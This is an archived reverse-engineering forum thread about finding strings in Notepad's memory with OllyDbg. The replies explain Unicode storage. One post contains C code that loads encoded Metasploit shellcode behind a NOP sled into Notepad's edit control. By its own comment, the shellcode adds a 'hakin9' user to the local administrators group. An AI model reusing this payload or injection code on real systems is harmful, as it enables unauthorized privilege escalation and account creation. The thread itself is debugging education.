String doesn't appear in [Memory map] - why? [Archive]

View Full Version : String doesn't appear in [Memory map] - why?

Ismaele

October 21st, 2009, 18:35

Good morning,
i'm a newbie.

I runned notepad.exe (under Windows XP, service packed) and i write on the main window some text.

Next, i opened Olly, attached notepad.exe and actualized the memory map.
I searched in Olly the string that i've previously writed on the main window of notepad.exe

Why i doesn't find in the memory map of Olly? I've searched but nothing !!!
Can you suggest me some solution, please? I'm using OllyDbg 1.10

Very tnx to all :-)

naides

October 21st, 2009, 19:06

I repeated your excercise: open notepad, write in it "Fucking find me".
Attached Olly.
Let it run.
Pause it.
View Memory
Search the whole block for "Fucking fi" in ascii. . .
->Nothing found
Go back to the begining of memory block.
Search "Fucking fi" in UNICODE
-> found the string somewhere in low memory, below 00400000.

Make sure you pay attention to the options, case sensitive or not, whole words or not, mind that the search engine goes from the cursor location towards the bottom (ie higher memory addresses).

Ismaele

October 22nd, 2009, 02:33

Very tnx mister !, :-)
solution you suggested me solved my question.

But, i ask you, why Olly behave like this?

The step you described me, is a step-by-step for all strings research in memory map?

Good morning

Ismaele

October 22nd, 2009, 04:26

Help, now i can't find hexadeciml values in Olly ! Why ?

I have that C code (compiled under Borland C++ builder 3) :
-------------------------------------------------------------
int main(int argc, char **argv)
{

HANDLE parentWindow, childWindow; //variabili usate, rispettivamente, per l'handle della classe PADRE e l'handle della classe FIGLIA
HHOOK hh;
char *buf;

/* win32_exec - EXITFUNC=process CMD=cmd.exe /c net user hakin9 hakin9 /add && net localgroup administrators /add hakin9 Size=240 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] = "\x33\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
"\x19\xe7\x78\x83\xeb\xfc\xe2\xf4\x35\xf1\xa3\x78\xc9\x19\x6c\x3d"
"\xf5\x92\x9b\x7d\xb1\x18\x08\xf3\x86\x01\x6c\x27\xe9\x18\x0c\x31"
"\x42\x2d\x6c\x79\x27\x28\x27\xe1\x65\x9d\x27\x0c\xce\xd8\x2d\x75"
"\xc8\xdb\x0c\x8c\xf2\x4d\xc3\x7c\xbc\xfc\x6c\x27\xed\x18\x0c\x1e"
"\x42\x15\xac\xf3\x96\x05\xe6\x93\x42\x05\x6c\x79\x22\x90\xbb\x5c"
"\xcd\xda\xd6\xb8\xad\x92\xa7\x48\x4c\xd9\x9f\x74\x42\x59\xeb\xf3"
"\xb9\x05\x4a\xf3\xa1\x11\x0c\x71\x42\x99\x57\x78\xc9\x19\x6c\x10"
"\xf5\x46\xd6\x8e\xa9\x4f\x6e\x80\x4a\xd9\x9c\x28\xa1\x67\x3f\x9a"
"\xba\x71\x7f\x86\x43\x17\xb0\x87\x2e\x7a\x8a\x1c\xe7\x7c\x9f\x1d"
"\xe9\x36\x84\x58\xa7\x7c\x93\x58\xbc\x6a\x82\x0a\xe9\x71\x86\x13"
"\xa0\x77\xde\x58\xa1\x78\x8c\x11\xa7\x20\xc7\x57\xa8\x7d\x83\x58"
"\xef\x3f\xc7\x16\xac\x6d\xc7\x14\xa6\x7a\x86\x14\xae\x6b\x88\x0d"
"\xb9\x39\x86\x1c\xa4\x70\x89\x11\xba\x6d\x95\x19\xbd\x76\x95\x0b"
"\xe9\x36\x86\x1c\xad\x39\x8f\x19\xa2\x70\x89\x41\xc9\x19\xe7\x78";

childWindow=(HANDLE)0x8020C;

if(!childWindow) {
printf("I does't find that handle !\n"

;
system("PAUSE"

;
return(1);
}
if(SendMessage(childWindow, EM_SETREADONLY, FALSE, 0)==0) {
printf("Signal WM_SETREADONLY sended to notepad.exe failed!\n"

;
system("PAUSE"

;
return 1;
}

buf = (char*)malloc(strlen(scode)+1024*1024+1); //modificato DA ME
buf = (char *)memset(buf, 0x90, 1024*1024);
strcat(buf, scode);
buf[strlen(buf)] = 0;
SendMessage(childWindow, EM_SETLIMITTEXT, strlen(scode)+1024*1024+1, 0);

if(!SendMessage(childWindow, WM_SETTEXT, 0, (LPARAM)buf)) {
printf("Sending WM_SETTEXT message failed!\n"

;
system("PAUSE"

;
return 1;
}

printf("OK !\n"

;
system("PAUSE"

;
return(0);
}
-----------------------------------------------------------------

My program run very well, actually write the scode[] array on the control "Edit" of notepad.exe, but i didn't find values "x33\xc9\x83\xe9" in the [Memory map] of Ollydbg.

Why? I also tried to search the value '33C983E9' like you suggest me. But nothing !

Instead of scode[] array, if i write some normal chars (like 'try' or 'testtesttest' or 'computercomputercomputer') on the 'Edit' control of notepad.exe, in the memory map i found.

I don't understand :-(

naides

October 22nd, 2009, 08:15

Quote:

[Originally Posted by Ismaele;83406]
But, i ask you, why Olly behave like this?

This is not a behavoir of Olly. Olly is obediently finding what we are asking for. It is a behavoir of NotePad: It is storing its strings in Unicode format. Ever since windows XP Windows uses Unicode to manipulate all strings in order to handle all the written alphabets in the planet, including Chinese

The step you described me, is a step-by-step for all strings research in memory map?

You may say so. You cannot predict what will be the format used by a given program to store a given item in memory: It may use ASCII, it may use UNICODE, it may use some proprietary encoding, or even the program may encrypt the strings to prevent us from locating them. . .

Good morning

in blue

naides

October 22nd, 2009, 08:41

The string is there in Unicode: You will not find the HEX : 33C983. . . which is a translation of \x33\xc9\x83. . . to its raw bytes equivalent. Only after the c compiler interprets \x33\xc9\x83 during compilation, it is translated to hex bytes and loaded into memory when you run the compiled program itself, not the C high level code text you wrote on the Edit control of Notepad.